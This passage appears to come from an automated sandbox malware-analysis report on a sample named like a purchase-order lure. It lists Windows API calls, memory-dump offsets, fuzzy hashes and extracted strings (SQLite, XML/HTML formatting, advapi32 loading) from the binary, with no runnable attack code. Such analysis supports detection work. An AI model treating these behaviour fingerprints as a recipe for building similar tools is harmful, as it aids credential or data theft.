                                                                                • Instruction Fuzzy Hash: CF41E6F25047018AF730AA65988176773C8DBD4329F20893FE466E27C3DB7CE841451D
                                                                                APIs
                                                                                • ??2@YAPAXI@Z.MSVCRT(0000000C), ref: 00405DE1
                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00405DFD
                                                                                • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E23
                                                                                • memset.MSVCRT ref: 00405E33
                                                                                • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E62
                                                                                • InvalidateRect.USER32(?,00000000,00000000,?,?,?,?), ref: 00405EAF
                                                                                • SetFocus.USER32(?,?,?,?), ref: 00405EB8
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00405EC8
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                • String ID:
                                                                                • API String ID: 2313361498-0
                                                                                • Opcode ID: 714c78ee16b9d0c535b2ccd9b722d7140f358af2491426836a426c957dcc8526
                                                                                • Instruction ID: b0df241c53c05d00948b57b0581abff4a91b8671001b7eb205ccc6b71985861b
                                                                                • Opcode Fuzzy Hash: 714c78ee16b9d0c535b2ccd9b722d7140f358af2491426836a426c957dcc8526
                                                                                • Instruction Fuzzy Hash: F231C1B1500601AFEB249F6AD88692AB7A8FF14344B11853FF545E72A0DB38ED90CFD4
                                                                                APIs
                                                                                • GetClientRect.USER32(?,?), ref: 00405F65
                                                                                • GetWindow.USER32(?,00000005), ref: 00405F7D
                                                                                • GetWindow.USER32(00000000), ref: 00405F80
                                                                                  • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                                                                                • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                                                                                • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                                                                                • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                                                                                • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                                                                                • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: Window$ItemMessageRectSend$Client
                                                                                • String ID:
                                                                                • API String ID: 2047574939-0
                                                                                • Opcode ID: e98f1b8ec4c98c4b3f876b541513d14ca347a33c497b9d7b5490fbbe5922d292
                                                                                • Instruction ID: 7069056512839d5548a4ade768bb81bcd5f8c043aef79b83aaef118172e1f21b
                                                                                • Opcode Fuzzy Hash: e98f1b8ec4c98c4b3f876b541513d14ca347a33c497b9d7b5490fbbe5922d292
                                                                                • Instruction Fuzzy Hash: 3421A4B1B4070977E60137629C47F7B666CEF95718F04003AFB007F1C2DABA5C0649A9
                                                                                APIs
                                                                                • GetSystemTime.KERNEL32(?), ref: 00418836
                                                                                • memcpy.MSVCRT(?,?,00000010), ref: 00418845
                                                                                • GetCurrentProcessId.KERNEL32 ref: 00418856
                                                                                • memcpy.MSVCRT(?,?,00000004), ref: 00418869
                                                                                • GetTickCount.KERNEL32 ref: 0041887D
                                                                                • memcpy.MSVCRT(?,?,00000004), ref: 00418890
                                                                                • QueryPerformanceCounter.KERNEL32(?), ref: 004188A6
                                                                                • memcpy.MSVCRT(?,?,00000008), ref: 004188B6
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                                                • String ID:
                                                                                • API String ID: 4218492932-0
                                                                                • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                                                                • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                                                                                APIs
                                                                                  • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                                                  • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                                                  • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                  • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                • memcpy.MSVCRT(?,?,00000040), ref: 0044A8BF
                                                                                • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044A90C
                                                                                • memcpy.MSVCRT(?,?,00000040), ref: 0044A988
                                                                                  • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000040,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A422
                                                                                  • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000008,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A46E
                                                                                • memcpy.MSVCRT(?,?,00000000), ref: 0044A9D8
                                                                                • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 0044AA19
                                                                                • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 0044AA4A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: memcpy$memset
                                                                                • String ID: gj
                                                                                • API String ID: 438689982-4203073231
                                                                                • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                                                                • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                                                                APIs
                                                                                • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000), ref: 00430D77
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: memcpy
                                                                                • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                                                                                • API String ID: 3510742995-2446657581
                                                                                • Opcode ID: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                                • Instruction ID: 6ffa86bec377aa4089670d2183b3ec09711c7f982517375fcd2495ffcd0e8f65
                                                                                • Opcode Fuzzy Hash: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                                • Instruction Fuzzy Hash: CE51CF71D00219DFCB10CF99C490AAEB7F5EF89319F21925BD841AB206D738AE45CF98
                                                                                APIs
                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                                                                • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                                                                • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                                                                • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                                                                • memset.MSVCRT ref: 00405ABB
                                                                                • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                                                                • SetFocus.USER32(?), ref: 00405B76
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$FocusItemmemset
                                                                                • String ID:
                                                                                • API String ID: 4281309102-0
                                                                                • Opcode ID: 2f4c27367ad0dcd0df6ff95742fdfb823844e6920604fec48c7e171fffcef4b8
                                                                                • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                                                                                • Opcode Fuzzy Hash: 2f4c27367ad0dcd0df6ff95742fdfb823844e6920604fec48c7e171fffcef4b8
                                                                                • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: _snwprintfwcscat
                                                                                • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                • API String ID: 384018552-4153097237
                                                                                • Opcode ID: ceefa94603245cfdc84b5d7ac4d3bb9d057f1e5f82a05c255ee601070e84ce5a
                                                                                • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                                                                                • Opcode Fuzzy Hash: ceefa94603245cfdc84b5d7ac4d3bb9d057f1e5f82a05c255ee601070e84ce5a
                                                                                • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: ItemMenu$CountInfomemsetwcschr
                                                                                • String ID: 0$6
                                                                                • API String ID: 2029023288-3849865405
                                                                                • Opcode ID: a1397ef96222afd124a0cc802277b776f8ca8d8a268962530e532de87b957585
                                                                                • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                                                                • Opcode Fuzzy Hash: a1397ef96222afd124a0cc802277b776f8ca8d8a268962530e532de87b957585
                                                                                • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                                                                APIs
                                                                                  • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                                                • memset.MSVCRT ref: 00405455
                                                                                • memset.MSVCRT ref: 0040546C
                                                                                • memset.MSVCRT ref: 00405483
                                                                                • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00405498
                                                                                • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054AD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: memset$memcpy$ErrorLast
                                                                                • String ID: 6$\
                                                                                • API String ID: 404372293-1284684873
                                                                                • Opcode ID: 0330b9b22cd30b5b2625a0a7e6ceceae146d238a8b356c7611763844912e7754
                                                                                • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                                                                • Opcode Fuzzy Hash: 0330b9b22cd30b5b2625a0a7e6ceceae146d238a8b356c7611763844912e7754
                                                                                • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                                                                APIs
                                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                                                • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                                                • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                                                • wcscpy.MSVCRT ref: 0040A0D9
                                                                                • wcscat.MSVCRT ref: 0040A0E6
                                                                                • wcscat.MSVCRT ref: 0040A0F5
                                                                                • wcscpy.MSVCRT ref: 0040A107
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                • String ID:
                                                                                • API String ID: 1331804452-0
                                                                                • Opcode ID: 23c89843948f9d4d6ccb23a927c15bd8e6af065920e5565f2ade9cfd678fbabf
                                                                                • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                                                                • Opcode Fuzzy Hash: 23c89843948f9d4d6ccb23a927c15bd8e6af065920e5565f2ade9cfd678fbabf
                                                                                • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                                                                APIs
                                                                                  • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                • String ID: advapi32.dll
                                                                                • API String ID: 2012295524-4050573280
                                                                                • Opcode ID: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                                                • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                                                                                • Opcode Fuzzy Hash: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                                                • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                                                                                APIs
                                                                                Strings
                                                                                • <%s>, xrefs: 004100A6
                                                                                • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                                                • <?xml version="1.0" ?>, xrefs: 0041007C
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: memset$_snwprintf
                                                                                • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                • API String ID: 3473751417-2880344631
                                                                                • Opcode ID: 2b06e63593618d13b5a5b8efcda018c795261ff0c1630acf280f9998f6f819b8
                                                                                • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                                                • Opcode Fuzzy Hash: 2b06e63593618d13b5a5b8efcda018c795261ff0c1630acf280f9998f6f819b8
                                                                                • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: wcscat$_snwprintfmemset
                                                                                • String ID: %2.2X
                                                                                • API String ID: 2521778956-791839006
                                                                                • Opcode ID: 31c2c2b958cbfb7d79e881a69437bc30ebdfa5a8327fe047e8a0291744cff554
                                                                                • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                                                • Opcode Fuzzy Hash: 31c2c2b958cbfb7d79e881a69437bc30ebdfa5a8327fe047e8a0291744cff554
                                                                                • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: _snwprintfwcscpy
                                                                                • String ID: dialog_%d$general$menu_%d$strings
                                                                                • API String ID: 999028693-502967061
                                                                                • Opcode ID: 80a89c9967db9934379ab2cd2962a5087f7f7915bf37897dca38dc6723802d56
                                                                                • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                                                                • Opcode Fuzzy Hash: 80a89c9967db9934379ab2cd2962a5087f7f7915bf37897dca38dc6723802d56
                                                                                • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                                                                APIs
                                                                                • strlen.MSVCRT ref: 00408DFA
                                                                                  • Part of subcall function 00408D18: memcpy.MSVCRT(?,?,00000008,00000008,00000010,00000040,?,?), ref: 00408D44
                                                                                • memset.MSVCRT ref: 00408E46
                                                                                • memcpy.MSVCRT(00000000,?,?,00000000,00000000,00000000), ref: 00408E59
                                                                                • memcpy.MSVCRT(?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408E6C
                                                                                • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,?,?,00000000,?,00000000,00000000,?,00000000), ref: 00408EB2
                                                                                • memcpy.MSVCRT(?,?,?,00000000,?,00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408EC5
                                                                                • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408EF2
                                                                                • memcpy.MSVCRT(?,00000000,00000014,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408F07
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: memcpy$memsetstrlen
                                                                                • String ID:
                                                                                • API String ID: 2350177629-0
                                                                                • Opcode ID: 5b01e9cdb19858cbca659f92b0ea30b8779096e26500951ee762ba1ee29ea98e
                                                                                • Instruction ID: 5f65aa9fdfa02acdbc3988aed820739efb0bf546d233f5e01752542f466a415e
                                                                                • Opcode Fuzzy Hash: 5b01e9cdb19858cbca659f92b0ea30b8779096e26500951ee762ba1ee29ea98e
                                                                                • Instruction Fuzzy Hash: 3951017290050DBEEB51DAE8CC45FEFBBBCAB09304F004476F709E6155E6349B498BA6
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: memset
                                                                                • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                                                • API String ID: 2221118986-1606337402
                                                                                • Opcode ID: f99636ea185a13f681f6ed3553038105d2c4243f795332ddfde7f7b33e8689c4
                                                                                • Instruction ID: 7aef5b05df8cb417835a49add62511a3dd126d480fa81acd131143259a3eb597
                                                                                • Opcode Fuzzy Hash: f99636ea185a13f681f6ed3553038105d2c4243f795332ddfde7f7b33e8689c4
                                                                                • Instruction Fuzzy Hash: 5D818A706083219FDB10CF25E48162BB7E1EF84318F96885EEC949B256D738EC55CB9B
                                                                                APIs
                                                                                • _mbscpy.MSVCRT(?,00000000,00000000,?,00000001), ref: 00408F50
                                                                                • memcmp.MSVCRT(?,?,00000010,0040951D,?,?,?,?,00000010,?,00000000,?,00000001), ref: 00408FB3
                                                                                • memset.MSVCRT ref: 00408FD4
                                                                                • memcmp.MSVCRT(?,?,00000010,0040951D,?,?,00000010,?,00000000,?,00000001), ref: 00409025
                                                                                • memset.MSVCRT ref: 00409042
                                                                                • memcpy.MSVCRT(?,?,00000018,00000001,?,?,00000020,?,?,?,?,00000000,?,00000001), ref: 00409079
                                                                                  • Part of subcall function 00408C3C: strlen.MSVCRT ref: 00408C96
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: memcmpmemset$_mbscpymemcpystrlen
                                                                                • String ID:
                                                                                • API String ID: 265355444-0
                                                                                • Opcode ID: 28e2d425d257f258de9af60d97ecb42603b9b505b60f53e6cc20d6bda128ffa8
                                                                                • Instruction ID: d0ac777748d33e6673793c59e161d6f76d61048b6b1b65ce46f59eb5e56095ce
                                                                                • Opcode Fuzzy Hash: 28e2d425d257f258de9af60d97ecb42603b9b505b60f53e6cc20d6bda128ffa8
